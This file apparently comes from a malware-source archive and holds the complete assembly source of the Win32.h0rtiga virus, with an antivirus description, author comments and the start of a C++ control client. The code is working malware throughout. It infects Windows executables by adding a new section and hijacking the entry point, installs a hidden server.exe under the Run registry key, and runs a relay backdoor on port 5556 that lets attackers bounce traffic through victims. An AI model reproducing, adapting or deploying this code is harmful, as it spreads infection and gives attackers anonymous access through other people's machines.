MalwareSourceCode/Win32/Infector/Win32.H0rtiga.asm

1607 lines
52 KiB
NASM
Raw Permalink Normal View History

2020-10-11 03:07:43 +00:00
;
; Win32.h0rtiga Coded by |Zan [@deepzone.org]
;
; <20>2000 DeepZone - Digital Security Center
;
; http://www.deepzone.org
;
;----------------------------------------------------------------------------
;
; Win32.Hortiga
;
;
; AVP's description
;
; - http://www.avp.ch/avpve/newexe/win32/hortiga.stm)
;
; It is a nonmemory resident parasitic Win32 virus. It searches
; for PE EXE files (Windows executables), then writes itself to
; the end of the file. To reserve a place for its code the virus
; creates a new section with the ".|Zan" name at the end of the
; file.
;
; The virus has "anonymous IP" ability. That means that a hacker
; may use infected machines as a "proxy server" sending packets
; with infected machine's IP address:
;
; IP1 IP2 IP3
; Hacker's machine -----> Infected machine -----> Target machine
;
; A hacker connects to the infected machine by using his IP
; address (IP1) and forces the infected machine to forward packets
; to the target machine, then infected machine's IP address (IP2) is
; used. Using this mechanism the hacker hides his IP address.
;
; The virus installs its "anonymous" component as stand-alone program
; using the filename SERVER.EXE. That program is created in the
; Windows system directory and registered in the auto-start registry
; key:
;
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run
; h0rtiga Server = "Windir\server.exe"
;
; where "Windir" is the Windows system folder.
;
; The virus contains the text string:
;
; (c) 2000. Win9x.h0rtiga v1.0 Server activated - http://mareasvivas.cjb.net
; Coded by |Zan - izan@galaxycorp.com / izan@deepzone.org
; Who are you???
;
; This string is used as ID-text to connect to the hacker's machine
; with the server on the infected machine.
;
; -- end AVP description
;
;
; Win32.h0rtiga by |Zan
;
; h0rtiga is a simple non resident parasite. It wasn't developed
; like a traditional viruse but it finished infecting win32 machines.
;
; Originally it was proof of concept code showing win9x's risks and
; holes in a spanish whitepaper called "Win32.h0rtiga : Anonimato e
; Intrusi<73>n ".
;
; When extra code was added to patch PE files inoculating h0rtiga code
; in arbitrary files it became a virus ...
;
; h0rtiga infects adding an extra section/object called ".|Zan". It
; can infect under win9x/NT/2k but its payload only play in win9x.
;
; This runtime infector doesn't implement "modern" features like stealth,
; encryptation or polymorphism but if "classic" features like timestamp
; or file attributes.
;
; Infecting with an extra section is "hard" and it had been more
; easy adding viral code to last section but i wanted a clear, fast
; and easy uninfection so i decided the longest, primitive & hard way to
; implement.
;
; h0rtiga payload plays a single server listening on 5556 port. This
; server lets full arbitrary relay and can be handle with a generic
; h0rtiga's client. yes, that's ... now you can imagine black hats
; exploiting infected win9x machines: anonymous surfing, faking e-mails,
; bypassing IRC bans ...
;
; Code contains clear labels and a lot of EQUs and structures documenting
; viral code ...
;
;
; greetings ...
; -------------
;
; spanish sec/hack groups, ADM, beavuh, b0f, non-commercial groups ...
;
; ... and, of course VLAD & 29A
;
; i'd like to give special thanks to Bumblebee/29A (fantastic VXer).
;
; I hope that h0rtiga can be a good contribution to this fantastic 29A
; release ;)
;
;
; deep greets
; -----------
;
; ^Anuska^> If you hit one time this key we'll hack this enterprise ...
; if you hit two times we'll hack their networks ... sorry
; mouse support isn't available ;)
;
; TheWizard> Win ME is the new msoft OS version ... I hope that now it
; can handle windows ;)
;
; Nemo> next step ... mmmm ... i don't know ... hack the fix again ?
;
;
; Special greetings ...
; ---------------------
;
; Win32.h0rtiga is dedicated to Sandra ...
;
;
;----------------------------------------------------------------------------
; Win32.h0rtiga - begin virus code (w32h0rtiga.asm)
;----------------------------------------------------------------------------
;------------------------------------------------------------
;Compiler options
;------------------------------------------------------------
.386P
locals
jumps
.model flat,STDCALL
;------------------------------------------------------------
;Just to show a message on virus 1st generation
;------------------------------------------------------------
extrn MessageBoxA:PROC
extrn GetModuleHandleA:PROC
extrn ExitProcess:PROC
;----------------------------------------------------------------------------
;Data Section
;----------------------------------------------------------------------------
.data
db 0
;----------------------------------------------------------------------------
;Code Section
;----------------------------------------------------------------------------
.code
start:
;------------------------------------------------------------
;h0rtiga main
;------------------------------------------------------------
mov eax, [esp]
gKerloop: xor edx, edx
dec eax
mov dx, [eax+3ch]
test dx, 0f800h
jnz gKerloop
cmp eax, [eax+edx+34h]
jnz gKerloop
call gdelta
gdelta: pop ebp
sub ebp, offset gdelta
lea edi, ebp + kernel
stosd
lea esi, ebp + sz_mGetProcAddr
call GetAPIExpK32
lea edi, ebp + ddGetProcAddress
stosd
lea esi, ebp + sz_mLoadLibraryA
call GetAPIExpK32
lea edi, ebp + ddLoadLibraryA
stosd
lea esi, ebp + sz_mKernel32
lea edi, ebp + addr_apis
mov ebx, NumAPISK32
call MakeTabla
lea esi, ebp + OSVersionInfo.dwOSVersionInfoSize
push SIZEOF_OSVERSIONINFO
pop ecx
xor al, al
delit: stosb
loop delit
lea edi, ebp + OSVersionInfo.dwOSVersionInfoSize
mov eax, SIZEOF_OSVERSIONINFO ; 148
stosd
sub edi, 4
push edi
call dword ptr [ebp + ddGetVersionExA]
test eax, eax
jz salir
cmp ebp + OSVersionInfo.dwPlatformId, VER_PLATFORM_WIN32_WINDOWS
jnz salir
call InsertaServidor
call BuscaHostToInfect
cmp eax, INVALID_HANDLE_VALUE
jz salir
xchg eax, ebx
InfectaMas: call InfecIt
call ContinuaBusqueda
test eax, eax
jnz InfectaMas
call TerminaBusqueda
salir: lea esi, ebp + OldEntryPointRVA
lodsd
xchg ebx, eax
push 0
call dword ptr [ebp + ddGetModuleHandleA]
add eax, ebx
jmp eax
;------------------------------------------------------------
;begin h0rtiga data
;------------------------------------------------------------
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
MAX_PATH EQU 260
WIN32_FIND_DATA STRUC
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
WFD_szFileName DB MAX_PATH DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
WIN32_FIND_DATA ENDS
SIZEOF_WIN32_FIND_DATA EQU SIZE WIN32_FIND_DATA
INVALID_HANDLE_VALUE EQU -1
VER_PLATFORM_WIN32_WINDOWS EQU 1
_OSVERSIONINFO STRUCT
dwOSVersionInfoSize DD ?
dwMajorVersion DD ?
dwMinorVersion DD ?
dwBuildNumber DD ?
dwPlatformId DD ?
szCSDVersion DB 128 DUP (?)
_OSVERSIONINFO ENDS
SIZEOF_OSVERSIONINFO EQU SIZE _OSVERSIONINFO
sz_mGetProcAddr db 'GetProcAddress', 0
ddGetProcAddress dd ?
sz_mLoadLibraryA db 'LoadLibraryA', 0
ddLoadLibraryA dd ?
kernel dd ?
Counter dw ?
AddressTableVA dd ?
OrdinalTableVA dd ?
NumAPISK32 equ 21
sz_mKernel32 db 'KERNEL32', 0
TablaK32 db 'ExitProcess', 0
db 'GetVersionExA', 0
db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'CloseHandle', 0
db 'SetFileAttributesA', 0
db 'SetFileTime', 0
db 'GetModuleHandleA', 0
db 'GetCommandLineA', 0
db 'GetSystemDirectoryA', 0
db 'ReadFile', 0
db 'WriteFile', 0
db 'SetFilePointer', 0
db 'GetCurrentProcessId', 0
db 'RegisterServiceProcess', 0
db 'GlobalAlloc', 0
addr_apis:
ddExitProcess dd ?
ddGetVersionExA dd ?
ddFindFirstFileA dd ?
ddFindNextFileA dd ?
ddFindClose dd ?
ddCreateFileA dd ?
ddCreateFileMappingA dd ?
ddMapViewOfFile dd ?
ddUnmapViewOfFile dd ?
ddCloseHandle dd ?
ddSetFileAttributesA dd ?
ddSetFileTime dd ?
ddGetModuleHandleA dd ?
ddGetCommandLineA dd ?
ddGetSystemDirectoryA dd ?
ddReadFile dd ?
ddWriteFile dd ?
ddSetFilePointer dd ?
ddGetCurrentProcessId dd ?
ddRegisterServiceProcess dd ?
ddGlobalAlloc dd ?
OSVersionInfo _OSVERSIONINFO ?
_maskExe db '*.EXE' , 0
MaxInfeccion equ 6
WinFindData WIN32_FIND_DATA ?
hFicActual dd ?
hCMapActual dd ?
newobject:
oname db ".|Zan", 0, 0, 0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reserved dd 0, 0, 0
objectflags dd 0e0000060h
SIZEOF_NEWOBJECT EQU 28h
ObjectTableOffset dd ?
NumObjects dw ?
ObjectAlign dd ?
FileAlign dd ?
ImageSize dd ?
SizeToMap dd ?
OldEntryPointRVA dd ?
hRead dd ?
hWrite dd ?
bytes_rw dd ?
sz_exec db 260 dup (?)
sz_nserver db '\server.exe', 0
addr1 dw 2
dw 0b415h
dd ?
addr2 dw 2
dw 0000h
db 192,168,0,1
sock1 dd ?
sock2 dd ?
gotit dd ?
buffsz equ 4096
adrbuff dd ?
fd_set1 dd 1,0
fd_set2 dd 1,0
fd_set struc
no dd 0
sockh dd 0
fd_set ends
ttl dd 0,64h
semaforo db 0
countbouncer db 0
msgentryserver db '(c) 2000. Win9x.h0rtiga v1.0 Server activated - http://mareasvivas.cjb.net', 13, 10
db 'Coded by |Zan - izan@galaxycorp.com / izan@deepzone.org', 13, 10, 13, 10
db 'Who are you ???', 13, 10
msgentryserverlen equ $-msgentryserver
NumAPISW32 equ 10
sz_mW32 db 'WSOCK32', 0
TablaW32 db 'WSAStartup', 0
db 'socket', 0
db 'bind', 0
db 'listen', 0
db 'accept', 0
db 'connect', 0
db 'send', 0
db 'recv', 0
db 'select', 0
db 'closesocket', 0
addr_apis2:
ddWSAStartup dd ?
ddsocket dd ?
ddbind dd ?
ddlisten dd ?
ddaccept dd ?
ddconnect dd ?
ddsend dd ?
ddrecv dd ?
ddselect dd ?
ddclosesocket dd ?
NumAPISAdv32 equ 3
sz_mAdv32 db 'ADVAPI32', 0
TablaAdv32 db 'RegCreateKeyExA', 0
db 'RegSetValueExA', 0
db 'RegCloseKey', 0
addr_apis3:
ddRegCreateKeyExA dd ?
ddRegSetValueExA dd ?
ddRegCloseKey dd ?
disposition dd ?
KeyHandle dd ?
clase db 'Run', 0
claselen equ $-clase
subkey db 'Software\Microsoft\Windows\CurrentVersion\Run', 0
KeyValuelen dd ?
KeyName db 'h0rtiga Server', 0
;------------------------------------------------------------
;end h0rtiga data
;------------------------------------------------------------
GetAPIExpK32: mov edx, esi
@_1: cmp byte ptr [esi], 0
jz @_2
inc esi
jmp @_1
@_2: inc esi
sub esi, edx
mov ecx, esi
xor eax, eax
mov word ptr [ebp + Counter], ax
mov esi, [ebp + kernel]
add esi, 3Ch
lodsw
add eax, [ebp + kernel]
mov esi, [eax + 78h]
add esi, [ebp + kernel]
add esi, 1Ch
lodsd
add eax, [ebp + kernel]
mov dword ptr [ebp + AddressTableVA], eax
lodsd
add eax, [ebp + kernel]
push eax
lodsd
add eax, [ebp + kernel]
mov dword ptr [ebp + OrdinalTableVA], eax
pop esi
@_3: push esi
lodsd
add eax, [ebp + kernel]
mov esi,eax
mov edi,edx
push ecx
cld
rep cmpsb
pop ecx
jz @_4
pop esi
add esi,4
inc word ptr [ebp + Counter]
jmp @_3
@_4: pop esi
movzx eax, word ptr [ebp + Counter]
shl eax,1
add eax,dword ptr [ebp + OrdinalTableVA]
xor esi,esi
xchg eax,esi
lodsw
shl eax,2
add eax,dword ptr [ebp + AddressTableVA]
mov esi,eax
lodsd
add eax, [ebp + kernel]
ret
MakeTabla: push esi
call dword ptr [ebp + ddLoadLibraryA]
push ebx
pop ecx
push eax
pop ebx
buki: lodsb
test al, al
jnz buki
MT1: push ecx
push esi
push ebx
call dword ptr [ebp + ddGetProcAddress]
push eax
MT2: lodsb
test al, al
jnz MT2
pop eax
stosd
pop ecx
loop MT1
ret
BuscaHostToInfect:
lea edi, ebp + Counter
xor ax, ax
stosw
lea esi, ebp + WinFindData
push esi
lea esi, ebp + _maskExe
push esi
call dword ptr [ebp + ddFindFirstFileA]
ret
InfecIt: push ebx
lea esi, ebp + WinFindData.WFD_szFileName
call EsInfectable
cmp eax, -1
jz II_error
call EliminaAtributosFichero
test eax, eax
jz II_error
lea esi, ebp + WinFindData.WFD_szFileName
push dword ptr [ebp + SizeToMap]
pop ebx
call Open&Maped_File_RW
cmp eax, -1
jz II_error
push eax
pop ebx
add eax, [ebx + 3ch]
push eax
pop edx
lea edi, ebp + ImageSize
mov eax, dword ptr [edx + 50h]
stosd
lea edi, ebp + NumObjects
mov ax, word ptr [edx + 6h]
stosw
lea edi, ebp + ObjectAlign
mov eax, dword ptr [edx + 38h]
stosd
mov eax, dword ptr [edx + 3ch]
stosd
xor eax, eax
add ax, word ptr [edx + 14h]
add eax, 18h
add eax, [ebx + 3ch]
add eax, ebx
mov dword ptr [ebp + ObjectTableOffset], eax
push eax
pop esi
xor eax, eax
mov ax, word ptr [ebp + NumObjects]
push SIZEOF_NEWOBJECT
pop ecx
xor edx, edx
mul ecx
add esi, eax
inc word ptr [ebp + NumObjects]
push esi
pop edi
mov eax, [edi - SIZEOF_NEWOBJECT + 8]
add eax, [edi - SIZEOF_NEWOBJECT + 12]
mov ecx, dword ptr [ebp + ObjectAlign]
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + RVA], eax
mov ecx, dword ptr [ebp + FileAlign]
push virlenght
pop eax
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicalsize], eax
mov ecx, dword ptr [ebp + ObjectAlign]
push virlenght
pop eax
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + virtualsize], eax
mov eax, [edi - SIZEOF_NEWOBJECT + 20]
add eax, [edi - SIZEOF_NEWOBJECT + 16]
mov ecx, dword ptr [ebp + FileAlign]
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicaloffset], eax
push virlenght
pop eax
add eax, dword ptr [ebp + ImageSize]
mov ecx, dword ptr [ebp + ObjectAlign]
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + ImageSize], eax
lea esi, ebp + newobject
mov ecx, 10
rep movsd
lea esi, ebp + NumObjects
mov edx, [ebx + 3ch]
add edx, ebx
lea edi, [edx + 6h]
movsw
lea esi, ebp + ImageSize
lea edi, [edx + 50h]
movsd
mov eax, dword ptr [ebp + OldEntryPointRVA]
push eax
push ebx
pop edx
add edx, [ebx + 3ch]
mov eax, dword ptr [edx + 28h]
lea edi, ebp + OldEntryPointRVA
stosd
mov eax, dword ptr [ebp + RVA]
mov dword ptr [edx + 28h], eax
lea esi, ebp + start
mov eax, dword ptr [ebp + physicaloffset]
add eax, ebx
xchg eax, edi
mov ecx, virlenght
rep movsb
pop eax
mov dword ptr [ebp + OldEntryPointRVA], eax
mov word ptr [edx + 4ch], 0d00dh
add ebp + Counter, 1
xchg eax, ebx
call Close&UnMaped_File_RW
call RestauraAtributosFichero
test eax, eax
jz II_error
II_error: pop ebx
ret
ContinuaBusqueda:
cmp [ebp + Counter], MaxInfeccion
jz CB_end
lea esi, ebp + WinFindData
push esi
push ebx
call dword ptr [ebp + ddFindNextFileA]
ret
CB_end: xor eax, eax
ret
TerminaBusqueda:
push ebx
call dword ptr [ebp + ddFindClose]
ret
Open&Maped_File_RW:
push 0
push 0
push 3h
push 0
push 0
push 80000000h or 40000000h
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz OMF_error
lea edi, ebp + hFicActual
stosd
push 0
push ebx
push 0
push 4h
push 0
push eax
call dword ptr [ebp + ddCreateFileMappingA]
test eax, eax
jz OMF_error
lea edi, ebp + hCMapActual
stosd
push ebx
push 0
push 0
push 2h
push eax
call dword ptr [ebp + ddMapViewOfFile]
test eax, eax
jz OMF_error
ret
OMF_error: push -1
pop eax
ret
Close&UnMaped_File_RW:
push eax
call dword ptr [ebp + ddUnmapViewOfFile]
test eax, eax
jz CUF_error
lea esi, ebp + WinFindData.WFD_ftLastWriteTime
push esi
lea esi, ebp + WinFindData.WFD_ftLastAccessTime
push esi
lea esi, ebp + WinFindData.WFD_ftCreationTime
push esi
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddSetFileTime]
lea esi, ebp + hCMapActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz CUF_error
xor eax, eax
ret
CUF_error: push -1
pop eax
ret
EliminaAtributosFichero:
push 80h
lea esi, ebp + WinFindData.WFD_szFileName
push esi
call dword ptr [ebp + ddSetFileAttributesA]
ret
RestauraAtributosFichero:
lea esi, ebp + WinFindData.WFD_dwFileAttributes
lodsd
push eax
lea esi, ebp + WinFindData.WFD_szFileName
push esi
call dword ptr [ebp + ddSetFileAttributesA]
ret
EsInfectable:
push 0
push 0
push 3h
push 0
push 0
push 80000000h
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz OMFR_error
lea edi, ebp + hFicActual
stosd
push 0
push 0
push 0
push 2h
push 0
push eax
call dword ptr [ebp + ddCreateFileMappingA]
test eax, eax
jz OMFR_error
lea edi, ebp + hCMapActual
stosd
push 0
push 0
push 0
push 4h
push eax
call dword ptr [ebp + ddMapViewOfFile]
test eax, eax
jz OMFR_error
push eax
push eax
pop edx
add eax, [edx + 3ch]
cmp word ptr [edx], 'ZM'
jnz NoInfect
cmp word ptr [eax], 'EP'
jnz NoInfect
cmp word ptr [eax + 4ch], 0d00dh
jnz SiInfect
NoInfect: push -1
pop ebx
jmp SNInfect
SiInfect: call CalculaSizeToMap
SNInfect: call dword ptr [ebp + ddUnmapViewOfFile]
test eax, eax
jz OMFR_error
lea esi, ebp + hCMapActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz OMFR_error
lea esi, ebp + hFicActual
lodsd
push eax
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz OMFR_error
xchg ebx, eax
ret
OMFR_error: push -1
pop eax
ret
CalculaSizeToMap:
push eax
pop ebx
xchg ebx, edx
xor eax, eax
mov ax, word ptr [edx + 6h]
mov word ptr [ebp + NumObjects], ax
xor eax, eax
add ax, word ptr [edx + 14h]
add eax, 18h
add eax, edx
mov dword ptr [ebp + ObjectTableOffset], eax
push eax
pop esi
xor eax, eax
mov ax, word ptr [ebp + NumObjects]
push SIZEOF_NEWOBJECT
pop ecx
xor edx, edx
mul ecx
add esi, eax
xor edx, edx
add edx, [ebx + 3ch]
add edx, ebx
lea edi, ebp + FileAlign
mov eax, dword ptr [edx + 3ch]
stosd
mov ecx, dword ptr [ebp + FileAlign]
push virlenght
pop eax
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicalsize], eax
mov eax, [esi - SIZEOF_NEWOBJECT + 20]
add eax, [esi - SIZEOF_NEWOBJECT + 16]
mov ecx, dword ptr [ebp + FileAlign]
xor edx, edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + physicaloffset], eax
xchg ebx, eax
lea esi, ebp + physicalsize
lodsd
add ebx, eax
mov dword ptr [ebp + SizeToMap], ebx
ret
InsertaRegistro:
lea esi, ebp + sz_mAdv32
lea edi, ebp + addr_apis3
mov ebx, NumAPISAdv32
call MakeTabla
lea esi, ebp + disposition
push esi
add esi, 4
push esi
push 0
push 0f003fh
push 0
add esi, 4
push esi
push 0
add esi, claselen
push esi
push 80000002h
call dword ptr [ebp + ddRegCreateKeyExA]
test eax, eax
jnz reg_error
lea esi, ebp + KeyHandle
lodsd
xchg eax, ebx
push dword ptr [ebp + KeyValuelen]
lea esi, ebp + sz_exec
push esi
push 1h
push 0
lea esi, ebp + KeyName
push esi
push ebx
call dword ptr [ebp + ddRegSetValueExA]
test eax, eax
jnz reg_error
push ebx
call dword ptr [ebp + ddRegCloseKey]
reg_error: ret
InsertaServidor:
call dword ptr [ebp + ddGetCommandLineA]
push eax
pop esi
lea edi, ebp + sz_exec
ot_bmas: lodsb
stosb
test al, al
jnz ot_bmas
push 0
push 00000080h
push 3
push 0
push 00000001h
push 80000000h
lea esi, ebp + sz_exec
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz errorEx
mov dword ptr [ebp + hRead], eax
push 260
lea ebx, ebp + sz_exec
push ebx
call dword ptr [ebp + ddGetSystemDirectoryA]
test eax, eax
jz errorEx
add eax, ebx
xchg eax, edi
lea esi, ebp + sz_nserver
ot_bmas2: lodsb
stosb
test al, al
jnz ot_bmas2
mov dword ptr [ebp + KeyValuelen], 0
lea esi, ebp + sz_exec
calclenstr: lodsb
inc dword ptr [ebp + KeyValuelen]
test al, al
jnz calclenstr
call InsertaRegistro
push 0
push 00000080h
push 1
push 0
push 0h
push 40000000h
lea esi, ebp + sz_exec
push esi
call dword ptr [ebp + ddCreateFileA]
cmp eax, -1
jz errorEx
mov dword ptr [ebp + hWrite], eax
read_again: xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 260
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
test eax, eax
jz errorEx
lea esi, ebp + bytes_rw
lodsd
test eax, eax
jz fdf
xchg eax, ebx
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push ebx
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
test eax, eax
jnz read_again
jz errorEx
fdf: push 0
push 0
push 3ch
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
push 0
push 0
lea esi, ebp + sz_exec
lodsd
add eax, 40
push eax
push eax
pop ebx
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
lea esi, ebp + sz_exec
lodsd
add eax, offsServer
push 0
push 0
push ebx
push eax
pop ebx
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push ebx
pop eax
lea edi, ebp + sz_exec
stosd
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
push 0
push 0
push 3ch
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 4
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddReadFile]
push 0
push 0
lea esi, ebp + sz_exec
lodsd
add eax, 92
push eax
push eax
pop ebx
lea esi, ebp + hRead
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push 0
push 0
push ebx
push eax
pop ebx
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddSetFilePointer]
push 2
pop eax
lea edi, ebp + sz_exec
stosd
xor eax, eax
push eax
lea edi, ebp + bytes_rw
push edi
stosd
push 2
lea esi, ebp + sz_exec
push esi
lea esi, ebp + hWrite
lodsd
push eax
call dword ptr [ebp + ddWriteFile]
lea esi, ebp + hRead
push esi
call dword ptr [ebp + ddCloseHandle]
test eax, eax
jz errorEx
lea esi, ebp + hWrite
push esi
call dword ptr [ebp + ddCloseHandle]
errorEx: ret
error: push 0
call dword ptr [ebp + ddExitProcess]
offsServer equ $-start
server: mov eax, [esp]
gKerloop2: xor edx, edx
dec eax
mov dx, [eax + 3ch]
test dx, 0f800h
jnz gKerloop2
cmp eax, [eax + edx + 34h]
jnz gKerloop2
call gdelta2
gdelta2: pop ebp
sub ebp, offset gdelta2
lea edi, ebp + kernel
stosd
lea esi, ebp + sz_mGetProcAddr
call GetAPIExpK32
lea edi, ebp + ddGetProcAddress
stosd
lea esi, ebp + sz_mLoadLibraryA
call GetAPIExpK32
lea edi, ebp + ddLoadLibraryA
stosd
lea esi, ebp + sz_mKernel32
lea edi, ebp + addr_apis
mov ebx, NumAPISK32
call MakeTabla
lea esi, ebp + sz_mW32
lea edi, ebp + addr_apis2
mov ebx, NumAPISW32
call MakeTabla
call dword ptr [ebp + ddGetCurrentProcessId]
push 1
push eax
call dword ptr [ebp + ddRegisterServiceProcess]
push buffsz
push 0
call dword ptr [ebp + ddGlobalAlloc]
cmp eax, -1
je error
mov dword ptr [ebp + adrbuff], eax
push eax
push 101h
call dword ptr [ebp + ddWSAStartup]
push 6
push 1
push 2
call dword ptr [ebp + ddsocket]
cmp eax, -1
je error
mov dword ptr [ebp + sock1], eax
push 16
lea esi, ebp + addr1
push esi
lea esi, ebp + sock1
lodsd
push eax
call dword ptr [ebp + ddbind]
cmp eax, -1
je error
push 1
lea esi, ebp + sock1
lodsd
push eax
call dword ptr [ebp + ddlisten]
mov byte ptr [ebp + semaforo], 0
configit:
mov al, byte ptr [ebp + semaforo]
test al, al
jnz QueEs?
push 0
push 0
lea esi, ebp + sock1
lodsd
push eax
call dword ptr [ebp + ddaccept]
mov dword ptr [ebp + gotit], eax
push 0
push msgentryserverlen
lea esi, ebp + msgentryserver
push esi
lea esi, ebp + gotit
lodsd
push eax
call dword ptr [ebp + ddsend]
push 0
push buffsz
lea esi, ebp + adrbuff
lodsd
push eax
lea esi, ebp + gotit
lodsd
push eax
call dword ptr [ebp + ddrecv]
xchg ebx, eax
lea esi, ebp + gotit
lodsd
push eax
call dword ptr [ebp + ddclosesocket]
cmp ebx, 8
jnz configit
lea esi, ebp + adrbuff
lodsd
xchg esi, eax
lodsw
mov byte ptr [ebp + semaforo], al
lea edi, ebp + addr2
add edi, 2
movsw
movsd
jmp configit
QueEs?:
dec al
test al, al
jz bis0
mov byte ptr [ebp + semaforo], 0
jmp configit
bis0: mov byte ptr [ebp + countbouncer], 20
bis: push 0
push 0
lea esi, ebp + sock1
lodsd
push eax
call dword ptr [ebp + ddaccept]
mov dword ptr [ebp + gotit], eax
mov dword ptr [ebp + fd_set1.sockh], eax
push 6
push 1
push 2
call dword ptr [ebp + ddsocket]
cmp eax, -1
je error
mov dword ptr [ebp + sock2], eax
mov dword ptr [ebp + fd_set2.sockh], eax
push 16
lea esi, ebp + addr2
push esi
lea esi, ebp + sock2
lodsd
push eax
call dword ptr [ebp + ddconnect]
cmp eax, -1
je nosok2
main_lp: lea esi, ebp + ttl
push esi
push 0
push 0
lea esi, ebp + fd_set1
push esi
push 10h
call dword ptr [ebp + ddselect]
cmp eax, -1
je outnow
cmp eax, 1
je r1w2
mov dword ptr [ebp + fd_set1.no], 1
lea esi, ebp + ttl
push esi
push 0
push 0
lea esi, ebp + fd_set2
push esi
push 10h
call dword ptr [ebp + ddselect]
cmp eax, -1
je outnow
cmp eax, 1
je r2w1
mov dword ptr [ebp + fd_set2.no], 1
jmp main_lp
outnow: lea esi, ebp + sock2
lodsd
push eax
call dword ptr [ebp + ddclosesocket]
nosok2: lea esi, ebp + gotit
lodsd
push eax
call dword ptr [ebp + ddclosesocket]
mov al, byte ptr [ebp + countbouncer]
test al, al
jz byebounz
dec al
mov byte ptr [ebp + countbouncer], al
jmp bis
byebounz: mov byte ptr [ebp + semaforo], 0
jmp configit
r1w2: push 0
push buffsz
lea esi, ebp + adrbuff
lodsd
push eax
lea esi, ebp + gotit
lodsd
push eax
call dword ptr [ebp + ddrecv]
or eax, eax
jz outnow
cmp eax, -1
je outnow
push 0
push eax
lea esi, ebp + adrbuff
lodsd
push eax
lea esi, ebp + sock2
lodsd
push eax
call dword ptr [ebp + ddsend]
cmp eax, -1
je outnow
jmp main_lp
r2w1: push 0
push buffsz
lea esi, ebp + adrbuff
lodsd
push eax
lea esi, ebp + sock2
lodsd
push eax
call dword ptr [ebp + ddrecv]
or eax, eax
jz outnow
cmp eax, -1
je outnow
push 0
push eax
lea esi, ebp + adrbuff
lodsd
push eax
lea esi, ebp + gotit
lodsd
push eax
call dword ptr [ebp + ddsend]
cmp eax, -1
je outnow
jmp main_lp
virlenght equ $-start
zero_generation:
mov ebx, offset f_generation
push 0
call GetModuleHandleA
xchg eax, ebx
sub eax, ebx
lea edi, OldEntryPointRVA
stosd
jmp start
f_generation:
push 0
push offset m_szTitle
push offset m_szCopyright
push 0
call MessageBoxA
push 0
call ExitProcess
m_szTitle db '-- Coded by |Zan [ 1st generation ]', 0
m_szCopyright db '-=[ (c) 2000. Win32.h0rtiga virus will run now ... ]=-', 0
end zero_generation
;----------------------------------------------------------------------------
; Win32.h0rtiga - end virus code (w32h0rtiga.asm)
;----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; Win32.h0rtiga - begin client code (h0rtclient.cpp/Visual C++ 6.0)
;----------------------------------------------------------------------------
#include <iostream.h>
#include <string.h>
#include <stdlib.h>
#include <winsock2.h>
#define MAX_BANNER 500
#define ACCION_BOUNCE 1
typedef unsigned char db;
typedef unsigned short dw;
typedef unsigned long dd;
typedef struct {
db accion;
dw puertoremoto;
dd direccion;
} Conf_Remota;
dd addrtmp;
void MostrarCreditos () {
cout << "\n\n\t\t (c) 2000 DeepZone - h0rtiga client (Win32) ...\n\n"
<< "\t\t\tCoded by |Zan - izan@galaxycorp.com\n\n\n"
<< "Uso : h0rtclient <h0rtiga host> <port> <new host> <port>\n"
<< "e.j.: h0rtclient host.com 5556 www.pandasoftware.es 80\n\n";
cout.flush();
}
